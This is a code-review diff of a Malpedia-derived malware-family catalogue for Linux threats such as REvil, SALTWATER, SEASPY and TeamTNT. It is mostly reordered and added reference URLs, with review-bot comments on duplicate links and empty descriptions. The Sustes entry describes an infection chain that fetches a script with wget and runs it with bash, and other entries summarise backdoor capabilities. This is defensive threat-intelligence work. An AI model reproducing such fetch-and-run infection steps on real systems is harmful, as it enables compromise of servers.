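Review bot: The new RansomEXX `description` opens with `According to SentineOne`, a typo for `SentinelOne`, and ends with a stray `\r\n\r\n` that no other description on this page carries; since this file is generated from Malpedia, the correction belongs upstream or the next run reintroduces it. Separately, the reordered refs keep the CrowdStrike carbon-spider post twice, once bare and once with `?utm_campaign=blog&utm_medium=soc&…` tracking parameters, so de-duplication is evidently done on the raw string. Normalising URLs (stripping `utm_*` and similar query parameters) before comparing would collapse these to one reference.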
@@ -6218,19 +6476,20 @@ "value": "RedAlert Ransomware" }, { - "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm", + "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan\u2019s configuration data is stored in a file encrypted with XOR algorithm", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe", - "https://vms.drweb.com/virus/?i=7754026&lng=en", + "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/", + "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt", + "https://asec.ahnlab.com/en/55229/", "https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/", "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/", - "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/", "https://sansec.io/research/rekoobe-fishpig-magento", - "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/", - "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/", "https://twitter.com/billyleonard/status/1458531997576572929", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt" + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://vms.drweb.com/virus/?i=7754026&lng=en" ], "synonyms": [], "type": [] 
@@ -6243,9 +6502,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile", + "https://asec.ahnlab.com/en/55785/", "https://github.com/f0rb1dd3n/Reptile", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf" + "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf" ], "synonyms": [], "type": [] 
@@ -6258,58 +6518,58 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil", - "https://www.youtube.com/watch?v=mDUMpYAOMOo", - "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo", - "https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5", - "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", - "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil", "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya", - "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", - "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/", - "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf", - "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", - "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", - "https://malienist.medium.com/revix-linux-ransomware-d736956150d0", - "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf", - "https://home.treasury.gov/news/press-releases/jy0471", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", - "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ", - "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf", - "https://ke-la.com/will-the-revils-story-finally-be-over/", - "https://angle.ankura.com/post/102hcny/revix-linux-ransomware", - 
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", - "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", - "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend", - "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/", - "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/", - "https://analyst1.com/file-assets/History-of-REvil.pdf", - "https://www.flashpoint-intel.com/blog/revil-disappears-again/", - "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021", - "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", - "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin", + "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo", "https://threatpost.com/ransomware-revil-sites-disappears/167745/", - "https://www.bbc.com/news/technology-59297187", - "https://github.com/f0wl/REconfig-linux", - "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", - "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/", - "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html", - "https://twitter.com/IntezerLabs/status/1452980772953071619", - 
"https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://www.youtube.com/watch?v=ptbNMlWxYnE", - "https://twitter.com/VK_Intel/status/1409601311092490248?s=20", - "https://twitter.com/VK_Intel/status/1409601311092490248", + "https://home.treasury.gov/news/press-releases/jy0471", + "https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5", "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/", - "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/", - "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", + "https://twitter.com/IntezerLabs/status/1452980772953071619", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil", + "https://angle.ankura.com/post/102hcny/revix-linux-ransomware", + "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", + "https://ke-la.com/will-the-revils-story-finally-be-over/", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", + "https://malienist.medium.com/revix-linux-ransomware-d736956150d0", + "https://twitter.com/VK_Intel/status/1409601311092490248", + "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil", + "https://www.bbc.com/news/technology-59297187", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/", + "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", + 
"https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", + "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", + "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html", + "https://www.youtube.com/watch?v=mDUMpYAOMOo", + "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/", + "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf", + "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021", + "https://analyst1.com/file-assets/History-of-REvil.pdf", + "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin", + "https://www.flashpoint-intel.com/blog/revil-disappears-again/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf", + "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/", + "https://github.com/f0wl/REconfig-linux", + "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/", "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment" + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + 
"https://www.youtube.com/watch?v=ptbNMlWxYnE", + "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend", + "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/", + "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", + "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ", + "https://twitter.com/VK_Intel/status/1409601311092490248?s=20", + "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment", + "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf", + "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/" ], "synonyms": [ "REvix" @@ -6364,9 +6624,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro", - "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/", + "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/", "https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro", - "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/" + "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/" ], "synonyms": [], "type": [] 
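Review bot: The reshuffled REvil refs still contain both `https://twitter.com/VK_Intel/status/1409601311092490248` and the same URL with `?s=20`, i.e. one source listed twice; a normalised-URL de-duplication step in the generator would drop the tracking variant. Apart from that, this hunk appears to be a pure reorder of roughly sixty links with no addition or removal that I can identify, which is the same non-deterministic ordering problem seen elsewhere in this diff and makes it hard to verify that nothing was lost.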
@@ -6379,8 +6639,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.royal_ransom", - "https://unit42.paloaltonetworks.com/royal-ransomware/", - "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html" + "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://unit42.paloaltonetworks.com/royal-ransomware/" ], "synonyms": [ "Royal", 
@@ -6404,17 +6665,31 @@ "uuid": "4947e9d3-aa13-4359-ac43-c1c436c409c9", "value": "Rshell" }, + { + "description": "According to Mandiant, SALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality. SALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling capabilities. The backdoor is implemented using hooks on the send, recv, close syscalls via the 3rd party kubo/funchook hooking library, and amounts to five components, most of which are referred to as \"Channels\" within the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic backdoor functionality.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.saltwater", + "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d55ea436-b2c1-400c-99dc-6e35bc05438b", + "value": "SALTWATER" + }, { "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. 
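Review bot: The new SALTWATER entry shares its Mandiant references with the SEASPY entry added further down but has no `related` link to it or to a threat-actor cluster, so a consumer cannot tell that the two belong to the same Barracuda ESG intrusion set described in those reports. If the generator can emit `related` relationships, linking the two families (and the actor cluster Mandiant attributes them to, where one exists) would make the entries usable for pivoting in MISP. One wording nit, inherited from the quoted Mandiant text: `hooks on the send, recv, close syscalls via the 3rd party kubo/funchook hooking library` describes user-space function hooking of the libc wrappers as far as I know, so `libc calls` would be more accurate than `syscalls`; that fix belongs upstream as well.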
It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", - "https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/", - "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", - "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/", + "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", + "https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/", + "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/", "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/" ], "synonyms": [], @@ -6428,9 +6703,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sbidiot", + "https://brianstadnicki.github.io/posts/malware-sbidiot-dec2021/", "https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/", - "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/", - "https://brianstadnicki.github.io/posts/malware-sbidiot-dec2021/" + "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/" ], "synonyms": [], "type": [] 
@@ -6438,6 +6713,22 @@ "uuid": "b4c20cf4-8e94-4523-8d48-7781aab6785d", "value": "SBIDIOT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.seaspy", + "https://www.cisa.gov/news-events/analysis-reports/ar23-209b", + "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", + "https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a6699c42-69d8-4bdd-8dd9-72f4c80efefa", + "value": "SEASPY" + }, { "description": "", "meta": { @@ -6469,7 +6760,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sidewalk", - "https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/" + "https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics" ], "synonyms": [], "type": [] @@ -6511,9 +6803,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sowat", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/", "https://twitter.com/billyleonard/status/1417910729005490177", - "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003", "https://twitter.com/bkMSFT/status/1417823714922610689", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003", "https://imp0rtp3.wordpress.com/2021/11/25/sowat/" ], "synonyms": [], 
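Review bot: The SEASPY entry is added with an empty `description` even though five references are attached, including a CISA malware analysis report (`ar23-209b`); an empty description makes the cluster unsearchable and gives an analyst reading a tagged MISP event nothing to go on. Malpedia apparently carries no description for this family, so either the Malpedia entry should be completed upstream or the generator should fall back to a one-line summary noting the product targeted and the backdoor nature, drawn from the first reference. As with SALTWATER, a `related` link between the two Barracuda-ESG families would also help.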
@@ -6553,8 +6846,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter", - "https://blog.netlab.360.com/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/", - "https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/" + "https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/", + "https://blog.netlab.360.com/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/" ], "synonyms": [], "type": [] @@ -6577,6 +6870,19 @@ "uuid": "df23ae3a-e10d-4c49-b379-2ea2fd1925af", "value": "Speculoos" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spry_socks", + "https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3b5c485b-b6a6-4586-a7dc-9e23a3b0aa5a", + "value": "SprySOCKS" + }, { "description": "", "meta": { 
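Review bot: SprySOCKS is added with an empty `description` and a single Trend Micro reference; the reference slug (`earth-lusca-employs-new-linux-backdoor`) already states the two facts worth recording — it is a Linux backdoor and Trend Micro attributes it to Earth Lusca — so a one-line description and, if an Earth Lusca actor cluster exists, a `related` link would make this entry far more useful than the bare name. Empty descriptions recur in this commit (SEASPY above, plus the pre-existing empty entries around it), so a generator-level fallback seems warranted rather than hand-editing.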
@@ -6596,12 +6902,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", - "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/", - "https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/", - "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/", - "https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/", + "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/", + "https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/", + "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/", + "https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/" ], "synonyms": [], "type": [] @@ -6614,10 +6920,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi", - "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", - "https://www.mandiant.com/resources/unc2891-overview", "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/", - "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/" + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", + "https://www.mandiant.com/resources/unc2891-overview" ], "synonyms": [], "type": [] 
@@ -6639,7 +6945,7 @@ "value": "Sunless" }, { - "description": "Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ", + "description": "Sustes Malware doesn\u2019t infect victims by itself (it\u2019s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes", @@ -6671,7 +6977,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sword2033", - "https://unit42.paloaltonetworks.com/alloy-taurus/" + "https://unit42.paloaltonetworks.com/alloy-taurus/", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/" ], "synonyms": [], "type": [] @@ -6684,9 +6991,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.symbiote", + "https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html", "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/", - "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/", "https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat", + "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/", "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote" ], "synonyms": [], 
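Review bot: The Symbiote refs now list `https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/` and the same URL without the trailing slash as two separate entries (the slash variant is the re-added line, the other is context), which confirms de-duplication is a raw string comparison; normalising trailing slashes and host case before comparing would collapse them. The added Trend Micro link is titled around BPFDoor variants, so it is worth confirming it actually discusses Symbiote rather than having been cross-linked by a shared tag.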
@@ -6715,10 +7023,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysrvhello",
- "https://www.lacework.com/sysrv-hello-expands-infrastructure/",
+ "https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet",
 "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
 "https://www.riskiq.com/blog/external-threat-management/sysrv-hello-cryptojacking-botnet/",
- "https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet"
+ "https://www.lacework.com/sysrv-hello-expands-infrastructure/"
 ],
 "synonyms": [
 "Sysrv"
@@ -6733,28 +7041,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt",
- "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf",
- "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/",
- "https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/",
- "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment",
- "https://sysdig.com/blog/teamtnt-aws-credentials/",
- "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
- "https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools",
- "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
 "https://tolisec.com/active-crypto-mining-operation-by-teamtnt/",
- "https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html",
- "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/",
+ "https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools",
 "https://unit42.paloaltonetworks.com/atoms/adept-libra/",
- "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials",
- "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server",
- "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
- "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/",
- "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
- "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool",
- "https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html",
 "https://unit42.paloaltonetworks.com/atoms/thieflibra/",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
+ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
+ "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt",
+ "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
+ "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera",
+ "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials",
+ "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/",
+ "https://sysdig.com/blog/teamtnt-aws-credentials/",
+ "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool",
+ "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/",
+ "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/",
+ "https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html",
+ "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
+ "https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html",
+ "https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -6767,8 +7076,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon",
- "https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers",
- "https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902"
+ "https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902",
+ "https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers"
 ],
 "synonyms": [],
 "type": []
@@ -6781,8 +7090,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tntbotinger",
- "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html",
- "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/"
+ "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/",
+ "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html"
 ],
 "synonyms": [],
 "type": []
